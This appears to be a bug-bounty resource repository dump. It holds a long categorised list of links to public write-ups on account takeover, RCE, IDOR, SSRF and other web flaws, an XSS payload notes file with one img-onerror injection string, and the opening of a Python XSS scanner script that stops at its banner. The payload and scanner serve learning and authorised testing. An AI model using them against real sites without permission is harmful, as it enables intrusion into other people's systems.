| 99 | ### Stealing Access Token 100 | - [Facebook Access Token Stolen](https://whitton.io/articles/stealing-facebook-access-tokens-with-a-double-submit/) by Jack Whitton - 101 | - [Obtaining Login Tokens for an Outlook, Office or Azure Account](https://whitton.io/articles/obtaining-tokens-outlook-office-azure-account/) by Jack Whitton 102 | 103 | - [Bypassing Digits web authentication's host validation with HPP](https://hackerone.com/reports/114169) by filedescriptor 104 | - [Bypass of redirect_uri validation with /../ in GitHub](http://homakov.blogspot.hk/2014/02/how-i-hacked-github-again.html?m=1) by Egor Homakov 105 | - [Bypassing callback_url validation on Digits](https://hackerone.com/reports/108113) by filedescriptor 106 | - [Stealing livechat token and using it to chat as the user - user information disclosure](https://hackerone.com/reports/151058) by Mahmoud G. (zombiehelp54) 107 | - [Change any Uber user's password through /rt/users/passwordless-signup - Account Takeover (critical)](https://hackerone.com/reports/143717) by mongo (mongo) 108 | - [Internet Explorer has a URL problem, on GitHub](http://blog.innerht.ml/internet-explorer-has-a-url-problem/) by filedescriptor. 
109 | - [How I made LastPass give me all your passwords](https://labs.detectify.com/2016/07/27/how-i-made-lastpass-give-me-all-your-passwords/) by labsdetectify 110 | - [Steal Google Oauth in Microsoft](http://blog.intothesymmetry.com/2015/06/on-oauth-token-hijacks-for-fun-and.html) 111 | - [Steal FB Access Token](http://blog.intothesymmetry.com/2014/04/oauth-2-how-i-have-hacked-facebook.html) 112 | - [Paypal Access Token Leaked](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html?m=1) 113 | - [Steal FB Access Token](http://homakov.blogspot.sg/2013/02/hacking-facebook-with-oauth2-and-chrome.html) 114 | - [Appengine Cool Bug](https://proximasec.blogspot.hk/2017/02/a-tale-about-appengines-authentication.html) 115 | - [Slack post message real life experience](https://labs.detectify.com/2017/02/28/hacking-slack-using-postmessage-and-websocket-reconnect-to-steal-your-precious-token/) 116 | - [Bypass redirect_uri](http://nbsriharsha.blogspot.in/2016/04/oauth-20-redirection-bypass-cheat-sheet.html) by nbsriharsha 117 | - [Stealing Facebook Messenger nonce worth 15k](https://stephensclafani.com/2017/03/21/stealing-messenger-com-login-nonces/) 118 | - [Steal Oculus Nonce and Oauth Flow Bypass](https://medium.com/@lokeshdlk77/bypass-oauth-nonce-and-steal-oculus-response-code-faa9cc8d0d37) 119 | 120 | #### Google oauth bypass 121 | 122 | - [Bypassing Google Authentication on Periscope's Administration Panel](https://whitton.io/articles/bypassing-google-authentication-on-periscopes-admin-panel/) By Jack Whitton 123 | 124 | ### CSRF 125 | 126 | - [Messenger.com CSRF that show you the steps when you check for CSRF](https://whitton.io/articles/messenger-site-wide-csrf/) by Jack Whitton 127 | - [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack)](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/) by Florian Courtial 128 | - [Hacking PayPal Accounts with one 
click (Patched)](http://yasserali.com/hacking-paypal-accounts-with-one-click/) by Yasser Ali 129 | - [Add tweet to collection CSRF](https://hackerone.com/reports/100820) by vijay kumar 130 | - [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) by phwd 131 | - [How i Hacked your Beats account ? Apple Bug Bounty](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) by @aaditya_purani 132 | - [FORM POST JSON: JSON CSRF on POST Heartbeats API](https://hackerone.com/reports/245346) by Dr.Jones 133 | - [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf) 134 | 135 | 136 | ### Remote Code Execution 137 | - [JDWP Remote Code Execution in PayPal](https://www.vulnerability-lab.com/get_content.php?id=1474) by Milan A Solanki 138 | - [XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook's servers](http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution) by Reginaldo Silva 139 | - [How I Hacked Facebook, and Found Someone's Backdoor Script](http://devco.re/blog/2016/04/21/how-I-hacked-facebook-and-found-someones-backdoor-script-eng-ver/) by Orange Tsai 140 | - [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html) by Orange Tsai 141 | - [uber.com may RCE by Flask Jinja2 Template Injection](https://hackerone.com/reports/125980) by Orange Tsai 142 | - [Yahoo Bug Bounty - *.login.yahoo.com Remote Code Execution](http://blog.orange.tw/2013/11/yahoo-bug-bounty-part-2-loginyahoocom.html) by Orange Tsai (Sorry its in Chinese Only) 143 | - [How we broke PHP, hacked Pornhub and earned $20,000](https://www.evonide.com/how-we-broke-php-hacked-pornhub-and-earned-20000-dollar/) by 
Ruslan Habalov 144 | - *Alert*, God-like write-up; make sure you know what ROP is before clicking, which I don't =( 145 | - [RCE due to tricky file upload](https://www.secgeek.net/bookfresh-vulnerability/) by secgeek 146 | - [WordPress SOME bug in plupload.flash.swf leading to RCE in Automattic](https://hackerone.com/reports/134738) by Cure53 (cure53) 147 | - [Read-Only user can execute arbitrary shell commands on AirOS](https://hackerone.com/reports/128750) by 93c08539 (93c08539) 148 | - [Remote Code Execution by image upload!](https://hackerone.com/reports/158148) by Raz0r (ru_raz0r) 149 | - [Popping a shell on the Oculus developer portal](https://bitquark.co.uk/blog/2014/08/31/popping_a_shell_on_the_oculus_developer_portal) by Bitquark 150 | - [Crazy! PornHub RCE AGAIN!!! How I hacked Pornhub for fun and profit - 10,000$](https://5haked.blogspot.sg/) by 5haked 151 | - [PayPal Node.js code injection (RCE)](http://artsploit.blogspot.hk/2016/08/pprce2.html) by Michael Stepankin 152 | - [eBay PHP Parameter Injection leading to RCE](http://secalert.net/#ebay-rce-ccs) 153 | - [Yahoo Acquisition RCE](https://seanmelia.files.wordpress.com/2016/02/yahoo-remote-code-execution-cms1.pdf) 154 | - [Command Injection Vulnerability in Hostinger](http://elladodelnovato.blogspot.hk/2017/02/command-injection-vulnerability-in.html?spref=tw&m=1) by @alberto__segura 155 | - [RCE in Airbnb by Ruby Injection (Rails string interpolation)](http://buer.haus/2017/03/13/airbnb-ruby-on-rails-string-interpolation-led-to-remote-code-execution/) by Brett Buerhaus 156 | - [RCE in Imgur by Command Line](https://hackerone.com/reports/212696) 157 | - [RCE in git.imgur.com by abusing outdated software](https://hackerone.com/reports/206227) by Orange Tsai 158 | - [RCE in Disclosure (same report as the symlink LFI entry under Local File Inclusion)](https://hackerone.com/reports/213558) 159 | - [Remote Code Execution via Struts2 on a Yahoo server](https://medium.com/@th3g3nt3l/how-i-got-5500-from-yahoo-for-rce-92fffb7145e6) 160 | - [Command Injection in Yahoo 
Acquisition](http://samcurry.net/how-i-couldve-taken-over-the-production-server-of-a-yahoo-acquisition-through-command-injection/) 161 | - [PayPal RCE](http://blog.pentestbegins.com/2017/07/21/hacking-into-paypal-server-remote-code-execution-2017/) 162 | - [$50k RCE in JetBrains IDE](http://blog.saynotolinux.com/blog/2016/08/15/jetbrains-ide-remote-code-execution-and-local-file-disclosure-vulnerability-analysis/) 163 | - [$20k RCE in Jenkins instance](http://nahamsec.com/secure-your-jenkins-instance-or-hackers-will-force-you-to/) by @nahamsec 164 | - [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/) 165 | - [Telekom.de Remote Command Execution!](http://www.sec-down.com/wordpress/?p=581) by Ebrahim Hegazy 166 | - [Magento Remote Code Execution Vulnerability!](http://www.sec-down.com/wordpress/?p=578) by Ebrahim Hegazy 167 | - [Yahoo! Remote Command Execution Vulnerability](http://www.sec-down.com/wordpress/?p=87) by Ebrahim Hegazy 168 | 169 | 170 | #### Deserialization 171 | - [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin 172 | - [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg 173 | - [Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) 174 | - [Java deserialization via JBoss](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals 175 | 176 | #### ImageTragick (ImageMagick) 177 | - [Exploiting ImageMagick to get RCE on Polyvore (Yahoo Acquisition)](http://nahamsec.com/exploiting-imagemagick-on-yahoo/) by NaHamSec 178 | - [Exploiting ImageMagick to get RCE on HackerOne](https://hackerone.com/reports/135072) by c666a323be94d57 179 | - [Trello bug bounty: Access server's files using ImageTragick](https://hethical.io/trello-bug-bounty-access-servers-files-using-imagetragick/) by Florian Courtial 
180 | - [40k Facebook RCE (ImageTragick)](http://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html) 181 | - [Yahoo Bleed 1](https://scarybeastsecurity.blogspot.hk/2017/05/bleed-continues-18-byte-file-14k-bounty.html) 182 | - [Yahoo Bleed 2](https://scarybeastsecurity.blogspot.hk/2017/05/bleed-more-powerful-dumping-yahoo.html) 183 | 184 | ### Insecure Direct Object Reference (IDOR) 185 | - [Trello bug bounty: The websocket receives data when a public company creates a team visible board](https://hethical.io/trello-bug-bounty-the-websocket-receives-data-when-a-public-company-creates-a-team-visible-board/) by Florian Courtial 186 | - [Trello bug bounty: Payment information is sent to the webhook when a team changes its visibility](https://hethical.io/trello-bug-bounty-payments-informations-are-sent-to-the-webhook-when-a-team-changes-its-visibility/) by Florian Courtial 187 | - [Change any user's password in Uber](https://hackerone.com/reports/143717) by mongo 188 | - [Vulnerability in YouTube allowed moving comments from any video to another](https://www.secgeek.net/youtube-vulnerability/) by secgeek 189 | - It's a *Google* vulnerability, so it's worth reading, as Google vulnerabilities are generally harder to find 190 | - [Twitter Vulnerability Could 191 | Credit Cards from Any Twitter Account](https://www.secgeek.net/twitter-vulnerability/) by secgeek 192 | - [One Vulnerability allowed deleting comments of any user in all Yahoo sites](https://www.secgeek.net/yahoo-comments-vulnerability/) by secgeek 193 | - [Microsoft-careers.com Remote Password Reset](http://yasserali.com/microsoft-careers-com-remote-password-reset/) by Yasser Ali 194 | - [How I could change your eBay password](http://yasserali.com/how-i-could-change-your-ebay-password/) by Yasser Ali 195 | - [Duo Security Researchers Uncover Bypass of PayPal’s Two-Factor Authentication](https://duo.com/blog/duo-security-researchers-uncover-bypass-of-paypal-s-two-factor-authentication) by Duo Labs 196 | - [Hacking 
Facebook.com/thanks Posting on behalf of your friends! 197 | ](http://www.anandpraka.sh/2014/11/hacking-facebookcomthanks-posting-on.html) by Anand Prakash 198 | - [How I got access to millions of [redacted] accounts](https://bitquark.co.uk/blog/2016/02/09/how_i_got_access_to_millions_of_redacted_accounts) 199 | - [All Vimeo Private videos disclosure via Authorization Bypass with Excellent Technical Description](https://hackerone.com/reports/137502) by Enguerran Gillier (opnsec) 200 | - [Urgent: attacker can access every data source on Bime](https://hackerone.com/reports/149907) by Jobert Abma (jobert) 201 | - [Downloading password protected / restricted videos on Vimeo](https://hackerone.com/reports/145467) by Gazza (gazza) 202 | - [Get organization info base on uuid in Uber](https://hackerone.com/reports/151465) by Severus (severus) 203 | - [How I Exposed your Primary Facebook Email Address (Bug worth $4500)](http://roy-castillo.blogspot.hk/2013/07/how-i-exposed-your-primary-facebook.html) by Roy Castillo 204 | - [DOB disclosed using “Facebook Graph API Reverse Engineering”](https://medium.com/@rajsek/my-3rd-facebook-bounty-hat-trick-chennai-tcs-er-name-listed-in-facebook-hall-of-fame-47f57f2a4f71#.9gbtbv42q) by Raja Sekar Durairaj 205 | - [Change the description of a video without publish_actions permission in Facebook](http://philippeharewood.com/change-the-description-of-a-video-without-publish_actions-permission/) by phwd 206 | - [Response To Request Injection (RTRI)](https://www.bugbountyhq.com/front/latestnews/dWRWR0thQ2ZWOFN5cTE1cXQrSFZmUT09/) by ?, be honest, thanks to this article, I have found quite a few bugs because of using his method, respect to the author! 
207 | - [Leak of all project names and all user names , even across applications on Harvest](https://hackerone.com/reports/152696) by Edgar Boda-Majer (eboda) 208 | - [Changing paymentProfileUuid when booking a trip allows free rides at Uber](https://hackerone.com/reports/162809) by Matthew Temmy (temmyscript) 209 | - [View private tweet](https://hackerone.com/reports/174721) 210 | - [Uber Enum UUID](http://www.rohk.xyz/uber-uuid/) 211 | - [Hacking Facebook’s Legacy API, Part 1: Making Calls on Behalf of Any User](http://stephensclafani.com/2014/07/08/hacking-facebooks-legacy-api-part-1-making-calls-on-behalf-of-any-user/) by Stephen Sclafani 212 | - [Hacking Facebook’s Legacy API, Part 2: Stealing User Sessions](http://stephensclafani.com/2014/07/29/hacking-facebooks-legacy-api-part-2-stealing-user-sessions/) by Stephen Sclafani 213 | - [Delete FB Video](https://danmelamed.blogspot.hk/2017/01/facebook-vulnerability-delete-any-video.html) 214 | - [Delete FB Video](https://pranavhivarekar.in/2016/06/23/facebooks-bug-delete-any-video-from-facebook/) 215 | - [Facebook Page Takeover by Manipulating the Parameter](http://arunsureshkumar.me/index.php/2016/09/16/facebook-page-takeover-zero-day-vulnerability/) by arunsureshkumar 216 | - [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) 217 | - [IDOR tweet as any user](http://kedrisec.com/twitter-publish-by-any-user/) by kedrisec 218 | - [Classic IDOR endpoints in Twitter](http://www.anandpraka.sh/2017/05/how-i-took-control-of-your-twitter.html) 219 | - [Mass Assignment, Response to Request Injection, Admin Escalation](https://seanmelia.wordpress.com/2017/06/01/privilege-escalation-in-a-django-application/) by sean 220 | - [Getting any Facebook user's friend list and partial payment card details](https://www.josipfranjkovic.com/blog/facebook-friendlist-paymentcard-leak) 221 | - [Manipulation of ETH 
balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty) 222 | 223 | 224 | ### XXE 225 | - [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) by detectify 226 | - [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) by Raghav Bisht 227 | - [XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) 228 | - [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) 229 | - [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/) 230 | 231 | ### Unrestricted File Upload 232 | - [File Upload XSS in image uploading of App in mopub](https://hackerone.com/reports/97672) by vijay kumar 233 | - [RCE deal to tricky file upload](https://www.secgeek.net/bookfresh-vulnerability/) by secgeek 234 | - [File Upload XSS in image uploading of App in mopub in Twitter](https://hackerone.com/reports/97672) by vijay kumar (vijay_kumar1110) 235 | 236 | ### Server Side Request Forgery (SSRF) 237 | - [ESEA Server-Side Request Forgery and Querying AWS Meta Data](http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/) by Brett Buerhaus 238 | - [SSRF to pivot internal network](https://seanmelia.files.wordpress.com/2016/07/ssrf-to-pivot-internal-networks.pdf) 239 | - [SSRF to LFI](https://seanmelia.wordpress.com/2015/12/23/various-server-side-request-forgery-issues/) 240 | - [SSRF to query google internal server](https://www.rcesecurity.com/2017/03/ok-google-give-me-all-your-internal-dns-information/) 241 | - [SSRF by using third party Open 
redirect](https://buer.haus/2017/03/09/airbnb-chaining-third-party-open-redirect-into-server-side-request-forgery-ssrf-via-liveperson-chat/) by Brett Buerhaus 242 | - [SSRF tips from BugBountyHQ (images)](https://twitter.com/BugBountyHQ/status/868242771617792000) 243 | - [Blind SSRF to RCE via HashiCorp Consul](http://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html) 244 | - [XXE at Twitter](https://hackerone.com/reports/248668) 245 | - [Blog post: Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface](http://blog.portswigger.net/2017/07/cracking-lens-targeting-https-hidden.html) 246 | - [Plotly AWS Metadata SSRF (and a stored XSS)](https://ysx.me.uk/a-pair-of-plotly-bugs-stored-xss-and-aws-metadata-ssrf/) 247 | 248 | ### Race Condition 249 | 250 | - [Race conditions on Facebook, DigitalOcean and others (fixed)](http://josipfranjkovic.blogspot.hk/2015/04/race-conditions-on-facebook.html) by Josip Franjković 251 | - [Race Conditions in Popular reports feature in HackerOne](https://hackerone.com/reports/146845) by Fábio Pires (shmoo) 252 | - [Hacking Starbucks for unlimited money](https://sakurity.com/blog/2015/05/21/starbucks.html) by Egor Homakov 253 | 254 | ### Business Logic Flaw 255 | - [How I Could Steal Money from Instagram, Google and Microsoft](https://www.arneswinnen.net/2016/07/how-i-could-steal-money-from-instagram-google-and-microsoft/) by Arne Swinnen 256 | - [How I could have removed all your Facebook notes](http://www.anandpraka.sh/2015/12/summary-this-blog-post-is-about.html) by Anand Prakash 257 | - [Facebook - bypass ads account's roles vulnerability 2015](http://blog.darabi.me/2015/03/facebook-bypass-ads-account-roles.html) by Pouya Darabi 258 | - [Uber Ride for Free](http://www.anandpraka.sh/2017/03/how-anyone-could-have-used-uber-to-ride.html) by Anand Prakash 259 | - [Uber Eats for Free](https://t.co/MCOM7j2dWX) (shortened t.co link; author not recorded) 260 | 261 | ### Authentication Bypass 262 | - [OneLogin authentication bypass on WordPress sites via XMLRPC in 
Uber](https://hackerone.com/reports/138869) by Jouko Pynnönen (jouko) 263 | - [2FA PayPal Bypass](https://henryhoggard.co.uk/blog/Paypal-2FA-Bypass) by henryhoggard 264 | - [SAML Bug in Github worth 15000](http://www.economyofmechanism.com/github-saml.html) 265 | - [Authentication bypass on Airbnb via OAuth tokens theft](https://www.arneswinnen.net/2017/06/authentication-bypass-on-airbnb-via-oauth-tokens-theft/) 266 | - [Uber Login CSRF + Open Redirect -> Account Takeover at Uber](http://ngailong.com/uber-login-csrf-open-redirect-account-takeover/) 267 | - [Administrative Panel Access](http://c0rni3sm.blogspot.hk/2017/08/accidentally-typo-to-bypass.html?m=1) by c0rni3sm 268 | - [Uber Bug Bounty: Gaining Access To An Internal Chat System](http://blog.mish.re/index.php/2017/09/06/uber-bug-bounty-gaining-access-to-an-internal-chat-system/) by mishre 269 | - [Flickr Oauth Misconfiguration](https://mishresec.wordpress.com/2017/10/12/yahoo-bug-bounty-exploiting-oauth-misconfiguration-to-takeover-flickr-accounts/) by mishre 270 | - [Slack SAML authentication bypass](http://blog.intothesymmetry.com/2017/10/slack-saml-authentication-bypass.html) by Antonio Sanso 271 | - [Shopify admin authentication bypass using partners.shopify.com](https://hackerone.com/reports/270981) by uzsunny 272 | 273 | ### HTTP Header Injection 274 | - [Twitter Overflow Trilogy in Twitter](https://blog.innerht.ml/overflow-trilogy/) by filedescriptor 275 | - [Twitter CRLF](https://blog.innerht.ml/twitter-crlf-injection/) by filedescriptor 276 | - [Adblock Plus and (a little) more in Google](https://adblockplus.org/blog/finding-security-issues-in-a-website-or-how-to-get-paid-by-google) 277 | - [$10k host header](https://sites.google.com/site/testsitehacking/10k-host-header) by Ezequiel Pereira 278 | 279 | ### Subdomain Takeover 280 | 281 | - [Hijacking tons of Instapage expired users Domains & Subdomains](http://www.geekboy.ninja/blog/hijacking-tons-of-instapage-expired-users-domains-subdomains/) by 
geekboy 282 | - [Reading Emails in Uber Subdomains](https://hackerone.com/reports/156536) 283 | - [Slack Bug Journey](http://secalert.net/slack-security-bug-bounty.html) - by David Vieira-Kurz 284 | - [Subdomain takeover and chain it to perform authentication bypass](https://www.arneswinnen.net/2017/06/authentication-bypass-on-ubers-sso-via-subdomain-takeover/) by Arne Swinnen 285 | - [Hacker.One Subdomain Takeover](https://hackerone.com/reports/159156) - by geekboy 286 | 287 | ### Author Write Up 288 | 289 | - [Payment Flaw in Yahoo](http://ngailong.com/abusing-multistage-logic-flaw-to-buy-anything-for-free-at-hk-deals-yahoo-com/) 290 | - [Bypassing Google Email Domain Check to Deliver Spam Email on Google’s Behalf](http://ngailong.com/bypassing-google-email-domain-check-to-deliver-spam-email-on-googles-behalf/) 291 | - [When Server Side Request Forgery combine with Cross Site Scripting](http://ngailong.com/what-could-happen-when-server-side-request-forgery-combine-with-cross-site-scripting/) 292 | 293 | 294 | ## XSSI 295 | 296 | - [Plain Text Reading by XSSI](http://balpha.de/2013/02/plain-text-considered-harmful-a-cross-domain-exploit/) 297 | - [JSON hijacking](http://blog.portswigger.net/2016/11/json-hijacking-for-modern-web.html) 298 | - [OWASP XSSI](https://www.owasp.org/images/f/f3/Your_Script_in_My_Page_What_Could_Possibly_Go_Wrong_-_Sebastian_Lekies%2BBen_Stock.pdf) 299 | - [Japan Identifier based XSSI attacks](http://www.mbsd.jp/Whitepaper/xssi.pdf) 300 | - [JSON Hijack Slide](https://www.owasp.org/images/6/6a/OWASPLondon20161124_JSON_Hijacking_Gareth_Heyes.pdf) 301 | 302 | ## Email Related 303 | 304 | - [This domain is my domain - G Suite A record vulnerability](http://blog.pentestnepal.tech/post/156959105292/this-domain-is-my-domain-g-suite-a-record) 305 | - [I got emails - G Suite Vulnerability](http://blog.pentestnepal.tech/post/156707088037/i-got-emails-g-suite-vulnerability) 306 | - [How I snooped into your private Slack messages [Slack Bug bounty 
worth $2,500]](http://blog.pentestnepal.tech/post/150381068912/how-i-snooped-into-your-private-slack-messages) 307 | - [Reading Uber’s Internal Emails [Uber Bug Bounty report worth $10,000]](http://blog.pentestnepal.tech/post/149985438982/reading-ubers-internal-emails-uber-bug-bounty) 308 | - [Slack/Yammer takeover using TicketTrick (hacking companies through their helpdesk)](https://medium.com/@intideceukelaire/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c) by Inti De Ceukelaire 309 | - [How I could have mass uploaded from every Flickr account!](https://ret2got.wordpress.com/2017/10/05/how-i-could-have-mass-uploaded-from-every-flickr-account/) 310 | 311 | ## Money Stealing 312 | 313 | - [Rounding error issue -> produce money for free on a Bitcoin site](https://hackerone.com/reports/176461) by 4lemon 314 | 315 | ## Local File Inclusion (2017) 316 | 317 | - [Disclosure Local File Inclusion by Symlink](https://hackerone.com/reports/213558) 318 | - [Facebook Symlink Local File Inclusion](http://josipfranjkovic.blogspot.hk/2014/12/reading-local-files-from-facebooks.html) 319 | - [GitLab Symlink Local File Inclusion](https://hackerone.com/reports/158330) 320 | - [GitLab Symlink Local File Inclusion Part II](https://hackerone.com/reports/178152) 321 | - [Multiple Company LFI (cloud-based)](http://panchocosil.blogspot.sg/2017/05/one-cloud-based-local-file-inclusion.html) 322 | - [LFI by video conversion, excited about this trick!](https://hackerone.com/reports/226756) 323 | 324 | ## Miscellaneous 325 | 326 | - [Good SAML pentest paper (bypassing SAML 2.0 SSO)](http://research.aurainfosec.io/bypassing-saml20-SSO/) 327 | - [A list of FB write-ups collected by phwd](https://www.facebook.com/notes/phwd/facebook-bug-bounties/707217202701640) by phwd 328 | - [NoSQL Injection](http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html) by websecurify 329 | - [CORS in action](http://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) 330 | - [CORS in Fb 
messenger](http://www.cynet.com/blog-facebook-originull/) 331 | - [Web App Methodologies](https://blog.zsec.uk/ltr101-method-to-madness/) 332 | - [XXE Cheatsheet](https://www.silentrobots.com/blog/2015/12/14/xe-cheatsheet-update/) 333 | - [The road to hell is paved with SAML Assertions, Microsoft Vulnerability](http://www.economyofmechanism.com/office365-authbypass.html#office365-authbypass) 334 | - [Study this if you'd like to learn MongoDB (NoSQL) injection via hash injection](https://cirw.in/blog/hash-injection) by cirw 335 | - [MongoDB injection again](http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html) by websecurify 336 | - [w3af talk about modern vulnerabilities](https://www.youtube.com/watch?v=GNU0_Uzyvl0) by w3af 337 | - [Web cache deception attack that leads to account takeover](http://omergil.blogspot.co.il/2017/02/web-cache-deception-attack.html) 338 | - [A talk to teach you how to use SAML Raider](https://www.usenix.org/conference/usenixsecurity12/technical-sessions/presentation/somorovsky) 339 | - [XSS Checklist when you have no idea how to exploit the bug](http://d3adend.org/xss/ghettoBypass) 340 | - [CTF write-ups, great for Bug Bounty](https://ctftime.org/writeups?tags=web200&hidden-tags=web%2cweb100%2cweb200) 341 | - [It turns out every site using jQuery Mobile together with an open redirect is vulnerable to XSS](http://sirdarckcat.blogspot.com/2017/02/unpatched-0day-jquery-mobile-xss.html) by sirdarckcat 342 | - [Bypass CSP by using google-analytics](https://hackerone.com/reports/199779) 343 | - [Payment Issue with PayPal](https://hackerone.com/reports/219215) 344 | - [Browser Exploitation in Chinese](http://paper.seebug.org/) 345 | - [XSS filter bypass](https://t.co/0Kpzo52ycb) 346 | - [Improper Markup Sanitization](https://github.com/ChALkeR/notes/blob/master/Improper-markup-sanitization.md) 347 | - [Breaking XSS mitigations via Script Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf) 348 | - 
[X41 Browser Security White Paper](https://browser-security.x41-dsec.de/X41-Browser-Security-White-Paper.pdf) 349 | - [Bug Bounty Cheatsheets](https://github.com/EdOverflow/bugbounty-cheatsheet) by EdOverflow 350 | - [Messing with the Google Buganizer System for $15,600 in Bounties](https://medium.freecodecamp.org/messing-with-the-google-buganizer-system-for-15-600-in-bounties-58f86cc9f9a5) 351 | - [Electron Security White Paper](https://www.blackhat.com/docs/us-17/thursday/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security-wp.pdf) 352 | - [Twitter's Vine Source code dump - $10080](https://avicoder.me/2016/07/22/Twitter-Vine-Source-code-dump/) 353 | - [SAML Bible](https://blog.netspi.com/attacking-sso-common-saml-vulnerabilities-ways-find/) 354 | - [Bypassing Google’s authentication to access their Internal Admin panels — Vishnu Prasad P G](https://medium.com/bugbountywriteup/bypassing-googles-fix-to-access-their-internal-admin-panels-12acd3d821e3) 355 | - [Smart Contract Vulnerabilities](http://www.dasp.co/) 356 | -------------------------------------------------------------------------------- /XSS_payloads.md: -------------------------------------------------------------------------------- 1 | ``` 2 | Try url/?testtest // then check the page source for where testtest is reflected (the surrounding context decides which payload can work) 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | // NOTE: lines 3-14 above are empty in this copy; the tag-based payloads appear to have been stripped on rendering 15 | "><img src=# onerror=prompt(1231231);> 16 | 17 | // Custom HTML tag 18 | #testxss 19 | 20 | If reflected between tags, even if your input is inside any kind of quotes, you can try to inject and escape from this context. 
then 21 | 22 | ``` 23 | -------------------------------------------------------------------------------- /XSSpotter.py: -------------------------------------------------------------------------------- 1 | ''' 2 | -- Version 0.2 -- 3 | ================================= 4 | Improvements made by Stephen Bray 5 | ================================= 6 | 7 | Built on top of the popular tool XssPy: 8 | XssPy - Finding XSS made easier 9 | Author: Faizan Ahmad (Fsecurify) 10 | Email: fsecurify@gmail.com 11 | ''' 12 | 13 | import mechanize 14 | import sys 15 | import os 16 | import httplib 17 | import argparse 18 | import logging 19 | import time 20 | import json 21 | 22 | import Cookie 23 | import cookielib 24 | from urlparse import urlparse 25 | 26 | br = mechanize.Browser() # initiating the browser 27 | br.addheaders = [ 28 | ('User-agent', 29 | 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11)Gecko/20071127 Firefox/2.0.0.11') 30 | ] 31 | br.set_handle_robots(False) 32 | br.set_handle_refresh(False) 33 | 34 | payloads = ['', '', ''] 35 | # Need to add payloads to test things like single tick 36 | urlpayloads = ['', '', ''] 37 | blacklist = ['.png', '.jpg', '.jpeg', '.mp3', '.mp4', '.avi', '.gif', '.svg', 38 | '.pdf'] 39 | 40 | # TOTAL CROSS SITE SCRIPTING FINDINGS 41 | xssLinks = [] 42 | highProbLinks = [] 43 | medProbLinks = [] 44 | lowProbLinks = [] 45 | 46 | class color: 47 | BLUE = '\033[94m' 48 | RED = '\033[91m' 49 | GREEN = '\033[92m' 50 | YELLOW = '\033[93m' 51 | BOLD = '\033[1m' 52 | END = '\033[0m' 53 | 54 | @staticmethod 55 | def log(lvl, col, msg): 56 | logger.log(lvl, col + msg + color.END) 57 | 58 | logger = logging.getLogger(__name__) 59 | lh = logging.StreamHandler() # Handler for the logger 60 | logger.addHandler(lh) 61 | formatter = logging.Formatter('[%(asctime)s] %(message)s', datefmt='%H:%M:%S') 62 | lh.setFormatter(formatter) 63 | 64 | parser = argparse.ArgumentParser() 65 | parser.add_argument('-u', action='store', dest='url', 66 | help='The 
URL to analyze (without http:// or https://)') 67 | parser.add_argument('-e', action='store_true', dest='compOn', 68 | help='Enable comprehensive scan') 69 | parser.add_argument('-v', action='store_true', dest='url_check', 70 | help='Add testing for xss in urls') 71 | parser.add_argument('-c', action='store', dest='cookies', 72 | help='A json formatted file that contains a list of cookies') 73 | results = parser.parse_args() 74 | 75 | #logger.setLevel(logging.DEBUG if results.verbose else logging.INFO) 76 | logger.setLevel(logging.INFO) 77 | domain = results.url 78 | 79 | # Live updates for user 80 | #\033[K clears a line and \x1b[2J\x1b[H refreshes the screen 81 | # Hacky as fuck and will probably break somehow 82 | def interface(status, curr_url, element, url_count, iteration): 83 | sys.stdout.flush() 84 | 85 | sys.stdout.write("\x1b[2J\x1b[H" + color.RED + "" 86 | " ____ ___ _________ __ __\n" 87 | " \ \/ / ______/ _____/_____ _____/ |__/ |_ ___________\n" 88 | " \ / / ___/\_____ \\\____ \ / _ \ __\ __\/ __ \_ __ \ \n" 